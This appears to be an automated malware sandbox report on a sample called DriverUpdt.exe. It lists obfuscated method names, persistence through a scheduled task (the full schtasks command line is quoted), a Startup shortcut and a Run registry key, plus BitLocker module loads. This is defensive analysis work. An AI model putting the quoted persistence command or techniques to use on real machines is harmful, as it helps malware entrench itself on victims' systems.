                      Source: DriverUpdt.0.dr, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.csHigh entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: DriverUpdt.0.dr, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csHigh entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: DriverUpdt.0.dr, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csHigh entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: DriverUpdt.0.dr, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csHigh entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: DriverUpdt.0.dr, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csHigh entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: DriverUpdt.0.dr, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.csHigh entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 0f5wN5iaksWJx8oMfJnXxCNtYs1IH8rt9K.csHigh entropy of concatenated method names: 'opDBjU1PODJbkaegdOB16WOFLY3mQwEdEl', 'a8JZBv7fLLr1RdVHhT7X73eC6HVDEuyzz5', '_0b9JnZEwICj7AGlBNURRztqML9SXeOZXL7', 'ATm6kN4FZHBZVfWhdbiVl10mjT', 'VD7JRi8WA6tNsZYOCrtsYfuvZV', '_55RVfoVYvecnmerTVPbxQt16vz', 'fW22Fiwx3IERa8JUW4qOSSwnFO', 'QPB9P6GSY9LK8xuIoVRml4j6MF', 'gzqTCi4f8OAhTPJItNGigaUu0T', 'XpA5SrtJGG2wBuUMwtKaY0RP2E'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, ZNHrNvFD9ZobwV38ubTReWLeO8bnAumccihqlfuYjWyldAumT.csHigh entropy of concatenated method names: 'avahQgg4hRxzX9sWEUVQHLXmMpxnnFQiZAhATcEne8jNC3GaHS6apCiUPFDRZ2tiMU', 'iiFlDfMB5MyGNa4QvvKZTieUzrznlepuhAftVwpjHqQyaIbiUMOa0yDQeLU5ZDvfvt', 'jSKnBOXrdi9UB1TQioMoUO8q6XAJicBEgFkb8UwhJy2Q2On2QORUreQXzhgeuvAnUh', 'MUGBiOpCAZALg18jYxbZem3mEJnIrJwCh5qELe8nZUzaT18guOceKdRTXNILt3qGh4'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, ItGbRSbZFa55CcXB.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_0Love8mNF6aQdUOwBy38dDjl1YTHDjVbSbOLcprgBKwiaR9GQJqhsr24QGQFBc7oR5', '_5CSekGcVzZeoXZVENEqxcwNMvwPPZKiVqsUftGWbLqoK0sGqe9F3gVvJh1EQlCCqY4', 'Ht267XslWyBGNwGKM8CnIlTTlhouBGyJmbW8Udltu3AppwidYGJJMEneGlGyg7L0u0', 'KWl0mfZs0Dl0gfgooBpj0tseVrhreDSUzs9bW3ppX0z5NFwdu7aM7NIm4QF3v9wRy3'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, Rh46SGTJYh5nC7MsPl2FieEVPZw16o7SqK.csHigh entropy of concatenated method names: 'APq8HycpkPPjuDvi1sU0rjrQUmaVP3ID5K', 'UAc4yzzQ0GHVyuqxYwn0WWNqNW5YVXEX1T', '_7GJx3tULSMI6DNglNBPRFZnT7FpG6XxC24', 'oNjeO3ZFk0i7KeWtYzLT6DEYzx5EIl1Skx', 'Hivj6AHvQE9Mw9dvVggOg6jXbqNcPsJN8t', 'suBZaleEhn3iSaelJmGDY5DltNl5Tewq00', 'VDkCCL325lQjGKNJKk7TBL2Udz2oezOxb9', '_0YZbHdatVdNEN8nbiS8yT54eVWO30E8DWa', 'lp9NjEbIPxs9pF55qE3jVLzvblspVcvmaH', 'UhWxUNDlFThOwjYPG0l0acHFr5NePqj52e'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, IxmT2WkPyORcZnISbnQeQ4J3xaAS3FBXxGK6ZtWktXuanuHSX.csHigh entropy of concatenated method names: 'BLM3rzpZtmjMMu9ZsUHeoVBJXmNvFTRdmUqRb7gYZvnQ023Cc', 'nh3KsCg04VCVMQzVX4yaL58h78ZCZR8yeuPao0ZRQAzQQfuhq', 'NSMkFOzg0rZ6YqpPV3jZhKbGaQFdPWF29l6I6P5YFrOgeKbV8', 'qs9Wu1E0FPVMQycOn1HJaAUJedRWZGda7UWzDgSkpWktqMZgy', 'QGfHhiirzqTpJFc5NkDUvgJg31bxC7yQtXexVJne2avAwOXKL', 'srbGpOt4IdjtvS1TwXRlvnc4c4gMPvIdCsO2p4tYzwPFtKHXP', '_3R8LTyvp37xGDVBNwmZfDvT0LDKI8CQ47hU8sbKhfmLlIZKVY', 'KrQ81CshIb95AY55FoK2Ee1LRHguA1kYew6tgd9j5l5CANh0s', '_80T3zQuCLmB5ehw5g8EaUt5gzDf0cydzCZVGIXQu9VyAEKVE0', 'lwJG5dNm7w2PzL4a9SPA0hMi69md5pEaJwj1OuoGCf6fCECxc'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, 2uBhJ8fSv8l0pNFJnFq2SeR3AXe9pdtb8Z.csHigh entropy of concatenated method names: 'Mdt9l9R8TF7ur7Pv30sF3z8cCt5ncWgSUS', '_70nnctB0EBs6NssjjTsDMAAfcZ4iiAEHaKkdAz63u5sgFONvGoKYnEmvZ5kohXRXUz207sWNz3P5dlDx9Qoo', 'olVlEttCG0PtcKVJ8QXyt4BxeUf13GiNneDO1Ctkq1AIuJ4jSloNmWQLAFcjbp6aLg3WjEOqU8zoAegrngbA', 'wrAbldAE7kHEx7Kx4FEe3dRz4nBQPFr3j0wvR6guJ9wnN4TTAfdOIU7cMx35Pohmhy8fRwMzE86QOEJ0V5ax', 'FXknOpZ2o73XPQpP4mWAElExaLv4JJSMQlVlXT1MA9uK3rCo7i2DNomtuzlFOQCjOIXboCjQ1fNpJeyi5KAF'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, e95G2DjFXzv6C0eArUQts1cNIeQlL39BGnN7z8xoz5lRERj07.csHigh entropy of concatenated method names: 'ikzeM2JjEiTZLrO4eUCXFnU3WhiotWH5eWDkWpRierwdr2jWl', 'YsZjJgGxZhrccUsYXC98oaLNoqPds9pMA56yCOIGchvARkPK3', '_9qYRdciTZi8i7BmpK0OOQJbLuUfk0z6ikVdYd1DyqBjlzB5Vx', 'xjT7ceg8SwwL3sI8Prh56VIZ0ES3HiNdmbcU8Cm75DFqlG2OS', 'ttlJyRRizCsAKjUHv21YMfaAgQrItnUt936IpaaS0IWCuuL79', '_7lBB1vY9590PUwREPO2XQ9Ta2N4rUi5ZXMjenqB87tjDhYrpf', 'Gv9IXoYTxUOMuYnNNc8bmf2rD4vZWhXeT8NBsI5cfmsvPkd9T', 'yBGjAMx4IrJ4aBRYYrLAGIaGfZ84WjDxBONjZCVTj7f3O6dzv', 'Inhu2x7FoMBVe9FuhOGNS6bRyCxJrr4oKyVkAtDg2IcXXlICq', 'Vb2OtZ2mFtvBXdxk6W24bVlMj4TR0t2hjt8ZveELUelgwbLWo'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, cAzqzAvd3bxf9n3F3HaWLzB2xJOXRxGRVOHOGdKnuAZ66nxtm.csHigh entropy of concatenated method names: 'ildmhkmnbomr0mhRclue73B4mqDqfe2JCONbWZi8jSg3MtK5L', 'nVAtaQnZ6l6nBm3lJhzBnKxeTFQmUXn7zcx5uYC0wgSdqcy9h', 'eBRTBiiKlaBa0nndhupVEfasKgyUQgsIYVjXrOAxWRHbx97Yy', 'xDDAcd24X0UM0InsZAzkXyNlZC0y1oxxZs08YSlDl5W7voDP9', '_9x3bq69WpSh2QEbPgy13f3Thf8mb07YJXQtTgORxCaKVouQ7r', 'DRBpVHXHuIDdraLjtTW3ud5dBP9RMkpv0ICIvukFEz8OdD914', 'Cm1g9Xqe6mvRnFJHFdCeAoPaFcp8RFYtH4OyMNAh2ZrNktAKB', 'zycGKiBG1PdklsIFy5rda165WUVvnKSgGnjiWxqJMhFCyfF6L', 'lLd9DKzpQ9cOwBL2Cqz03ESn4JJdLZlGGegBMZAEgRLcpbTLz', 'qEejvT4kIexfScEWiaTm5ayBpThzE6FSO130Sq9CSehtYMKy0'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, NV31X1ToxhOFhVuWPZSu670P9wPGjQJEsv.csHigh entropy of concatenated method names: 'j70LpoWliDlcDxqBLr7QPUVmRwzEZZSB5Q', 'XjyxFp9w2yxFP7yagokte9Txm6vSpEwZvu', 'xsIANs6XzK9V9g4bVJ7oYf2yaC2F6Zdoui', 'SCYpS2v9ZMrHbvPKUkLCFTdqvJwrWL6UIq', 'Gn3LPYcAEH4fT4FDq0lYO2pqy1ZyTAMzHJ', 'wqOdlSLJYxuGSGNkBiX4qpJaeYvgLOEtyT', 'YPaFf6ag4KSOtFiZYcsP8kSHEABZbUeg0Y', 'W5kNoQ1Lru1E9kA2mBElGDjEiNqtw2kYzY', 'Fg7NzeJUpyCxTbjekUC33MYJZYr1kYncAM', 'JPViTqXldagtsTNADEBTIiJu1dzXJmcJ3g'
                      Source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, wOOq5bB92Ba7ooz2WkCQzTmIBUxVaDWziB.csHigh entropy of concatenated method names: 'R4qUnPzsX0NNtkNpbJLbOefCNgIn8Khuyn', 'wJMZ8oQvfLskpob9at41iUQcenI8WcFxS1', 'JDj0bhNXMA4oVfZMP8tr1xDpOnCEknUWCj', 'VSLvHoxKCl8UT61ZJzsYVNx0hIvaK5Draj', '_88qow1UlAh03CWPLgNcWynEtzl', 'clcGaDtaQDW3m5zqoXpsOYFE0S', '_652Oz4ZQx0IEy53L0DdCU8bVhA', 'MV4RQrPbq6IgaySoRPKtxrBaex', 'TDpTfW2S1YbyGXkCojqO0lNSsq', 'joZe4kEAR1UlntbknsLA6l9pCX'
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Roaming\DriverUpdtJump to dropped file
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Roaming\DriverUpdtJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnkJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnkJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverUpdtJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverUpdtJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
